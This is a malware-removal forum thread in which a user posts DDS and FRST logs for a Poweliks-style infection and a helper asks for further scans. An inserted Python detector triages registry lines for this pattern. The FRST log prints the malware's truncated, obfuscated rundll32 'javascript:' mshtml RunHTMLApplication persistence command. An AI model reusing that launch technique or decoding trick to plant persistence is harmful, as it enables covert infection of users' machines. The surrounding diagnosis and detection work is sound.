
dllhost.exe hidden malware/virus


5 replies to this topic

#1 bcv15

bcv15

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:09:04 PM

Posted 24 September 2014 - 10:47 PM

Hello all,

 

I've been having a particularly nasty infection of some sort.

The topic was started in the Am I infected forum here:

 

http://www.bleepingcomputer.com/forums/t/549287/20-dllhostexe-hogging-resources-in-win-7/sicl

 

Basically, I've been having a problem with dllhost.exe hogging up my CPU and RAM.

This only happens when an internet connection is active. Once they pop up, if I disconnect from the internet, either Wi-Fi or hardwired, almost all of them disappear.

Using Process Monitor, I found out those dllhosts point to temp files in the users\appdata\local\temp folder.

I've emptied that folder numerous times, but they will return.

I've run Malwarebytes, MSE, McAfee Security Plus, Norton Powereraser, MBAR, Rkill, Security Kit, TFC, JRT, AdwCleaner, Minitool kit, ESET, Windows Repair from Tweaking.com.

Initial scans found some adware/malware and it was removed or quarantined.

 

I've also had problems with popups saying that powershell has stopped working, but I thought it is unrelated.

 

Occasionally, the computer will blue screen also. I have not been able to see the reason as the screen disappears too fast.

At the moment it is acting OK. I'm using Firefox; it seems sometimes that if I start IE, the dllhosts will start.

Update, started IE, and they started again.

 

Here is the DDS scan log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.17280  BrowserJavaVersion: 10.67.2
Run by Matts at 22:49:56 on 2014-09-24
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3037.1860 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\aestsrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\SearchIndexer.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\IDT\WDM\sttray.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\taskmgr.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\rundll32.exe
C:\Windows\system32\windowspowershell\v1.0\powershell.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\wermgr.exe
C:\Windows\system32\conhost.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com
uWindow Title = Internet Explorer, optimized for Bing and MSN
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - c:\program files\mcafee security scan\3.8.150\McAfeeMSS_IE.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
uRun: [DellSystemDetect] c:\users\matts\appdata\local\apps\2.0\w22xg8xy.x98\vyhxe5mw.kww\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SysTrayApp] c:\program files\idt\wdm\sttray.exe
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\mcafee~1.lnk - c:\program files\mcafee security scan\3.8.150\SSScheduler.exe
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - c:\progra~1\micros~4\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~4\office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: dell.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{3EE1595F-A5AB-4C82-BB3B-386D7601E741} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{627729EF-1B3F-4C8D-B0A0-A843952F64AA} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{627729EF-1B3F-4C8D-B0A0-A843952F64AA}\F4F4441343 : DHCPNameServer = 192.168.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\matts\appdata\roaming\mozilla\firefox\profiles\6m5pp8gy.default\
FF - prefs.js: browser.search.selectedEngine -
FF - plugin: c:\progra~1\micros~4\office14\NPAUTHZ.DLL
FF - plugin: c:\progra~1\micros~4\office14\NPSPWRAP.DLL
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1167637.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_15_0_0_152.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2014-7-17 231800]
R2 AESTFilters;Andrea ST Filters Service;c:\windows\system32\driverstore\filerepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe [2014-9-21 81920]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-8-18 176128]
R2 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-8-30 95920]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW73.sys [2012-12-26 86544]
R3 k57nd60x;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\k57nd60x.sys [2009-6-7 273448]
R3 netw5v32;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 32 Bit;c:\windows\system32\drivers\netw5v32.sys [2009-6-10 4231168]
R3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2014-8-22 288120]
S1 MpKsl8c5a2e11;MpKsl8c5a2e11;c:\programdata\microsoft\microsoft antimalware\definition updates\{75d41f0a-42e8-498f-ac63-699978ec903e}\MpKsl8c5a2e11.sys [2014-9-24 39464]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-10-23 172192]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2011-4-11 62464]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-9-13 108032]
S3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\mcafee security scan\3.8.150\McCHSvc.exe [2014-4-9 235696]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 20992]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2010-11-20 52224]
S3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2012-10-20 1343400]
.
=============== Created Last 30 ================
.
2014-09-24 13:37:09    908840    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\{33622cc5-6c96-408c-a354-f184372c0810}\gapaengine.dll
2014-09-24 13:36:46    8806800    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\{75d41f0a-42e8-498f-ac63-699978ec903e}\mpengine.dll
2014-09-24 13:24:47    --------    d-----w-    c:\windows\system32\CatRoot2
2014-09-24 05:48:12    --------    d-----w-    c:\windows\system32\wbem\repository
2014-09-24 03:07:44    --------    d-----w-    c:\windows\system32\wbem\repository.002
2014-09-24 02:59:49    --------    d-----w-    C:\RegBackup
2014-09-24 02:49:21    --------    d-----w-    c:\program files\Tweaking.com
2014-09-24 02:44:42    96680    ----a-w-    c:\windows\system32\WindowsAccessBridge.dll
2014-09-23 03:01:33    --------    d-----w-    c:\program files\ESET
2014-09-23 02:34:28    --------    d-----w-    c:\windows\ERUNT
2014-09-23 01:06:38    8806800    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-09-22 22:54:50    --------    d-----w-    C:\FRST
2014-09-21 22:52:07    --------    d-----w-    c:\program files\Broadcom
2014-09-21 22:49:50    61440    ----a-w-    c:\windows\system32\aestaren.dll
2014-09-21 22:49:50    511488    ----a-w-    c:\windows\system32\ctapo32.dll
2014-09-21 22:49:50    368640    ----a-w-    c:\windows\system32\aestecap.dll
2014-09-21 22:49:50    142848    ----a-w-    c:\windows\system32\aestacap.dll
2014-09-21 22:49:49    86016    ----a-w-    c:\windows\system32\AESTCom.dll
2014-09-21 22:49:49    536576    ----a-w-    c:\windows\system32\idtmini1.exe
2014-09-21 22:49:49    47104    ----a-w-    c:\windows\system32\ctppld.dll
2014-09-21 22:49:49    3600384    ----a-w-    c:\windows\system32\stlang.dll
2014-09-21 22:49:49    12021852    ----a-w-    c:\windows\system32\idtcpl.cpl
2014-09-21 22:49:48    --------    d-----w-    c:\windows\system32\SRSLabs
2014-09-21 22:48:50    408576    ----a-w-    c:\windows\system32\drivers\stwrt.sys
2014-09-21 22:48:48    914944    ----a-w-    c:\windows\system32\stapo.dll
2014-09-21 22:48:48    405504    ----a-w-    c:\windows\system32\stcplx.dll
2014-09-21 22:48:47    485888    ------w-    c:\windows\system32\stapi32.dll
2014-09-21 22:48:47    175616    ----a-w-    c:\windows\system32\st326217.dll
2014-09-21 22:48:31    --------    d-----w-    c:\program files\IDT
2014-09-21 21:41:31    --------    d-----w-    c:\users\matts\appdata\roaming\Dell
2014-09-21 21:40:10    --------    d-----w-    c:\programdata\PC-Doctor for Windows
2014-09-21 21:40:08    --------    d-----w-    c:\programdata\PCDr
2014-09-21 21:40:06    --------    d-----w-    c:\program files\Dell Support Center
2014-09-21 21:15:06    --------    d-----w-    c:\program files\My Dell
2014-09-21 21:00:13    --------    d-----w-    c:\users\matts\appdata\roaming\PCDr
2014-09-21 21:00:02    --------    d-----w-    C:\temp
2014-09-21 20:56:50    --------    d-----w-    c:\users\matts\appdata\local\Microsoft_Corporation
2014-09-20 19:30:10    --------    d-----w-    C:\AdwCleaner
2014-09-20 12:36:21    --------    d-----w-    c:\users\matts\appdata\local\CrashDumps
2014-09-20 03:38:27    --------    d-----w-    C:\NPE
2014-09-20 03:26:11    --------    d-----w-    c:\users\matts\appdata\local\NPE
2014-09-20 03:26:10    --------    d-----w-    c:\programdata\Norton
2014-09-15 00:35:48    --------    d-----w-    c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-09-14 22:19:29    110296    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-14 22:19:06    75480    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-09-14 22:19:06    51928    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-09-14 22:19:06    --------    d-----w-    c:\program files\Malwarebytes Anti-Malware
2014-09-13 22:34:15    2285056    ----a-w-    c:\windows\system32\msmpeg2vdec.dll
2014-09-12 03:08:29    --------    d-----w-    C:\958f45868474b8ea08185f0d725a
2014-09-11 01:02:55    550912    ----a-w-    c:\windows\system32\kerberos.dll
2014-09-11 01:02:54    1059840    ----a-w-    c:\windows\system32\lsasrv.dll
2014-09-11 01:02:38    1987584    ----a-w-    c:\windows\system32\d3d10warp.dll
2014-09-11 01:02:37    793600    ----a-w-    c:\windows\system32\TSWorkspace.dll
2014-09-02 18:26:04    2352640    ----a-w-    c:\windows\system32\win32k.sys
2014-09-02 18:26:03    305152    ----a-w-    c:\windows\system32\gdi32.dll
2014-08-27 19:08:49    --------    d-sh--w-    c:\users\matts\appdata\local\EmieUserList
2014-08-27 19:08:49    --------    d-sh--w-    c:\users\matts\appdata\local\EmieSiteList
.
==================== Find3M  ====================
.
2014-09-22 06:41:56    231568    ------w-    c:\windows\system32\MpSigStub.exe
2014-09-19 23:18:00    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-19 23:18:00    701104    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
2014-08-18 22:08:55    4232704    ----a-w-    c:\windows\system32\jscript9.dll
2014-08-18 21:57:44    2724864    ----a-w-    c:\windows\system32\mshtml.tlb
2014-08-18 21:57:30    4096    ----a-w-    c:\windows\system32\ieetwcollectorres.dll
2014-08-18 21:46:26    454656    ----a-w-    c:\windows\system32\vbscript.dll
2014-08-18 21:45:23    61952    ----a-w-    c:\windows\system32\iesetup.dll
2014-08-18 21:44:44    51200    ----a-w-    c:\windows\system32\ieetwproxystub.dll
2014-08-18 21:44:09    61952    ----a-w-    c:\windows\system32\MshtmlDac.dll
2014-08-18 21:36:07    112128    ----a-w-    c:\windows\system32\ieUnatt.exe
2014-08-18 21:36:05    108032    ----a-w-    c:\windows\system32\ieetwcollector.exe
2014-08-18 21:35:24    597504    ----a-w-    c:\windows\system32\jscript9diag.dll
2014-08-18 21:30:29    646144    ----a-w-    c:\windows\system32\MsSpellCheckingFacility.exe
2014-08-18 21:22:48    60416    ----a-w-    c:\windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 21:08:54    2014208    ----a-w-    c:\windows\system32\inetcpl.cpl
2014-08-18 21:07:44    1068032    ----a-w-    c:\windows\system32\mshtmlmedia.dll
2014-08-18 20:46:48    1812992    ----a-w-    c:\windows\system32\wininet.dll
2014-07-25 06:35:46    875688    ----a-w-    c:\windows\system32\msvcr120_clr0400.dll
2014-07-17 22:05:08    95920    ----a-w-    c:\windows\system32\drivers\NisDrvWFP.sys
2014-07-17 22:05:08    231800    ----a-w-    c:\windows\system32\drivers\MpFilter.sys
2014-07-16 02:46:02    2048    ----a-w-    c:\windows\system32\tzres.dll
2014-07-14 01:42:02    654336    ----a-w-    c:\windows\system32\rpcrt4.dll
2014-07-09 01:29:32    6144    ----a-w-    c:\windows\system32\KBDYAK.DLL
2014-07-09 01:29:31    6144    ----a-w-    c:\windows\system32\KBDBASH.DLL
2014-06-30 22:14:53    8856    ----a-w-    c:\windows\system32\icardres.dll
.
============= FINISH: 22:50:16.94 ===============
 

 

here is the attach Zip

 

Thanks in advance for any insight to this issue.

 

Brian




 


#2 Elise

Elise

    Bleepin' Blonde


  • Malware Study Hall Admin
  • 61,207 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Romania
  • Local time:04:04 AM

Posted 25 September 2014 - 02:26 AM

Hi Brian,
The PowerShell pop-ups are related to the infection (it uses PowerShell to launch itself). There are a few variants and not all tools detect this malware. Can you please try the following:
  • Please download Farbar Recovery Scan Tool.

    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Double-click on FRST.exe to run it and click Yes at the disclaimer.
  • The tool will open.
  • Press the Scan button.
  • It will make two logs (FRST.txt and addition.txt) in the same location where you saved frst.exe. Please include both logs in your next reply.

regards, Elise


"Now faith is the substance of things hoped for, the evidence of things not seen."

 


 

Malware analyst @ Emsisoft
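
Added example, not part of any post in this thread and not FRST's own logic: a Python triage of FRST registry lines for the pattern seen in the entry that the FRST log posted in this thread marks `<==== Poweliks!` (rundll32 launching a `javascript:` command through `mshtml,RunHTMLApplication` from a `localserver32` value). It goes slightly beyond the one log line by trying small character shifts on the `eval("...` argument; all function and variable names are hypothetical.

```python
import re

# Registry lines copied from the FRST log posted in this thread; the third is
# the entry FRST itself marks as Poweliks. The detector ignores that marker.
SAMPLE_FRST_LINES = r"""
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [458844 2009-06-29] (IDT, Inc.)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
""".strip().splitlines()

# FRST prints registry items as "<key>: <data>".
ENTRY_RE = re.compile(r"^(?P<key>HK[A-Z_]+\\.*?):\s+(?P<data>.*)$")
# Annotations FRST appends to the data; removed before matching.
FRST_FLAG_RE = re.compile(r"\s*<====.*$")
FRST_TRUNC_RE = re.compile(r"\s*\(the data entry has \d+ more characters\)\.?\s*$")
EVAL_ARG_RE = re.compile(r'eval\("([^"]*)')
COM_SERVER_RE = re.compile(r"\\(?:localserver32|inprocserver32)$", re.I)

CHECKS = [
    ("rundll32 used as the launcher",
     re.compile(r"\brundll32(?:\.exe)?\b", re.I)),
    ("script moniker in the command line",
     re.compile(r"\b(?:javascript|vbscript):", re.I)),
    ("mshtml RunHTMLApplication entry point",
     re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)),
]
# Tokens that suggest a shifted string has become readable script.
SCRIPT_HINTS = ("document", "script", "ActiveXObject")


def shift_chars(text, delta):
    """Shift every character code by delta (wraps inside the Unicode range)."""
    return "".join(chr((ord(c) + delta) % 0x110000) for c in text)


def unshift_eval_argument(data):
    """Try small shifts on the eval("...") argument; return (delta, text) or (None, None)."""
    m = EVAL_ARG_RE.search(data)
    if not m:
        return None, None
    for delta in (-3, -2, -1, 1, 2, 3):
        candidate = shift_chars(m.group(1), delta)
        if any(hint in candidate for hint in SCRIPT_HINTS):
            return delta, candidate
    return None, None


def triage_frst_registry(lines):
    """Return one finding per registry line that combines at least two indicators."""
    findings = []
    for line in lines:
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        data = FRST_TRUNC_RE.sub("", FRST_FLAG_RE.sub("", m.group("data")))
        reasons = [label for label, rx in CHECKS if rx.search(data)]
        if len(reasons) < 2:
            # rundll32 alone is common in legitimate autoruns; require a second signal.
            continue
        if COM_SERVER_RE.search(m.group("key")):
            reasons.append("stored as a COM server command (localserver32/inprocserver32)")
        delta, decoded = unshift_eval_argument(data)
        findings.append({
            "key": m.group("key"),
            "reasons": reasons,
            "eval_shift": delta,
            "eval_decoded": decoded,
        })
    return findings


if __name__ == "__main__":
    for finding in triage_frst_registry(SAMPLE_FRST_LINES):
        print(finding["key"])
        for reason in finding["reasons"]:
            print("  -", reason)
        if finding["eval_decoded"] is not None:
            print("  eval argument, shift %d: %s"
                  % (finding["eval_shift"], finding["eval_decoded"]))
```

On the sample, only the `localserver32` line is reported, and the visible part of its `eval` argument becomes readable script text when each character code is lowered by one.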


#3 bcv15

bcv15
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:09:04 PM

Posted 25 September 2014 - 09:05 PM

Thank you Elise,

Sorry about taking so long to get back to you. I tried this morning, but have been having issues with this.

Ran the FRST, but it will not generate an addition.txt file. Well it will, but Windows can't find it after it does.

At first I thought it was because it was in the downloads directory. So I moved FRST to the desktop, still no addition file.

If I search for it, windows will show a file, but when I try to open it, it says it can't find it.

I found other logs in the C:\FRST\logs, would that be useful?

Computer has blue screened and rebooted a couple of times this morning, then I had to go to work before I could straighten it out.

Something else I have noticed is that MsMpeng.exe is constantly running, using anywhere from 25-50 CPU cycles.

I don't know if it's related. I wasn't sure if I should shut down Windows defender or not.

Anyway, here is the FRST log file:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-09-2014
Ran by Matts (administrator) on MATTS-PC on 25-09-2014 10:51:39
Running from C:\Users\Matts\Desktop
Loaded Profile: Matts (Available profiles: Matts)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\stacsv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\WerFault.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-09-05] (Adobe Systems Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [458844 2009-06-29] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...\Run: [DellSystemDetect] => C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe [267328 2014-09-21] (Dell)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=EIE9HP&PC=UP50
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xDC9F3545A5CFCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default
FF SearchEngineOrder.1: Ask Search
FF SelectedSearchEngine: user_pref("browser.search.selectedEngine", "");
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
